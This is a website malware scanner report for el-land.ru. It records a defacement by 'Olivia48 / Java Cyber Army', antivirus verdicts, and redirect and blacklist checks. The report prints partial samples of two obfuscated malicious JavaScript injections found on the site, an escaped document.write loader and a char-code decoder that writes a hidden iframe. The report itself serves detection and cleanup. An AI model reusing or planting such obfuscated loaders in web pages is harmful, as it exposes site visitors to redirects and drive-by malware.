New scan:

Malware Scanner report for el-land.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we  (35 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://el-land.ru/
200 OK
Content-Length: 19903
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

document.write('\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006C\u0061\u006E\u0067\u0075\u0061\u0067\u0065\u003D\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0075\u006E\u0065\u0073\u0063\u0061\u0070\u0065\u0028\u0027\u0025\u0033\u0043\u0025\u0037\u0033\u0025\u0036\u0033\u0025\u0037\u0032\u0025\u0036\u0039\u0025\u0037\u0030\u0025\u0037\u0034\u0025\u0032\u0030\u0025\u0036\u0043\u00
... 3000 bytes are skipped ...
u0073\u0066\u006F\u0075\u0025\u0032\u0036\u0033\u0033\u0025\u0032\u0036\u0034\u0046\u0025\u0032\u0036\u0034\u0044\u0030\u0066\u006E\u0063\u0066\u0065\u0025\u0032\u0036\u0034\u0046\u0025\u0032\u0036\u0034\u0044\u0030\u0065\u006A\u0077\u0025\u0032\u0036\u0034\u0046\u0025\u0032\u0036\u0033\u0031\u0025\u0032\u0036\u0034\u0044\u0030\u0054\u0064\u0073\u006A\u0071\u0075\u0025\u0032\u0036\u0034\u0046\u0025\u0032\u0036\u0031\u0042\u0031\u0027\u0029\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E');

Antivirus reports:

nProtect
JS:Trojan.Crypt.KA
F-Secure
JS:Trojan.Crypt.KA
Norman
Inor.A
GData
JS:Trojan.Crypt.KA
BitDefender
JS:Trojan.Crypt.KA

Deface/Content modification. The following signature was found: This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we

...[506 bytes skipped]...
n" class="no-js">
<link rel="shortcut icon" href="http://i.imgur.com/QYUFm5u.png">
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>--|olivia48|--</title>
<META NAME="description" CONTENT="This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we'll do whatever we can,we mightn't use a weapon but We'll use stronger tools it's Our brains">
<META NAME="keywords" CONTENT="This Site Has Been Hacked by Olivia48, Hacked by Olivia48, Defaced by Olivia48, Olivia48 Was Here, Olivia48, Single Attacker, BlackHat, Hacker, Thief, ******, Defacer, Vuln, Inject, Leakforums, Maintenance">
<META NAME="robot" CONTENT="JAVA CYBER ARMY"> <META NAME="copyright" C
...[18932 bytes skipped]...


http://el-land.ru/logs/content/
200 OK
Content-Length: 54619
Content-Type: text/html
clean
http://el-land.ru/logs/content/aopkcn44.js
200 OK
Content-Length: 3282
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function iuy(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!13!10!118!97!114!32!107!101!121!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!121!73!100!40!39!116!111!112!39!41!46!102!105!114!115!116!67!104!105!108!100!46!110!111!100!101!86!97!108!117!101!59!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!34!60!100!105!118!32!97!108!105!103!110!6
... 2285 bytes are skipped ...
2!46!116!111!47!86!113!80!34!62!60!47!105!102!114!97!109!101!62!39!41!59!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!39!60!73!78!80!85!84!32!99!108!97!115!115!61!101!112!111!106!49!48!32!116!121!112!101!61!104!105!100!100!101!110!32!118!97!108!117!101!61!101!105!105!101!62!39!41!59!13!10!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}

Antivirus reports:

AntiVir
JS/Agent.UO.2
Avast
JS:Redirector-GB [Trj]
Ad-Aware
JS:Trojan.Crypt.KE
Ikarus
Exploit.HTML.IframeRef
nProtect
JS:Trojan.Crypt.KE
K7AntiVirus
Riskware ( c50c5f170 )
Comodo
TrojWare.JS.Agent.jg
Emsisoft
JS:Trojan.Crypt.KE (B)
K7GW
Exploit ( 04c557611 )
McAfee-GW-Edition
JS/Redierctor.bd
Microsoft
VirTool:JS/Obfuscator.CC
Kaspersky
Trojan.JS.Redirector.zx
MicroWorld-eScan
JS:Trojan.Crypt.KE
Fortinet
JS/Kryptik.BP!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Redierctor.bd
NANO-Antivirus
Trojan.Script.Packed.iagb
F-Secure
JS:Trojan.Crypt.KE
F-Prot
JS/Dccrypt.H.gen
AVG
JS/Redir
Norman
Decdec.A
GData
JS:Trojan.Crypt.KE
Commtouch
JS/Dccrypt.H.gen
ESET-NOD32
JS/Kryptik.BP
BitDefender
JS:Trojan.Crypt.KE

http://el-land.ru/logs/content/razdel.php?pid
404 Not Found
Content-Length: 221
Content-Type: text/html
clean
http://el-land.ru/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173209
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173205
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173202
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173158
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173128
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173115
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173057
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173041
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813173017
404 Not Found
Content-Length: 222
Content-Type: text/html
clean
http://el-land.ru/logs/content/content.php?pid/20120813172953
404 Not Found
Content-Length: 222
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: el-land.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0
Connection: close
Date: Thu, 11 Jun 2015 21:43:00 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 11 Jun 2015 21:43:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: google_adv2=0; expires=Thu, 23-Jul-2015 13:43:00 GMT
Set-Cookie: d2fb1624cb281074625429e88fbd8c6a=7b916117f5b281023e8820cc9f868b4a; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: el-land.ru
Referer: http://www.google.com/search?q=el-land.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=el-land.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://el-land.ru/

Result: el-land.ru is not infected or malware details are not published yet.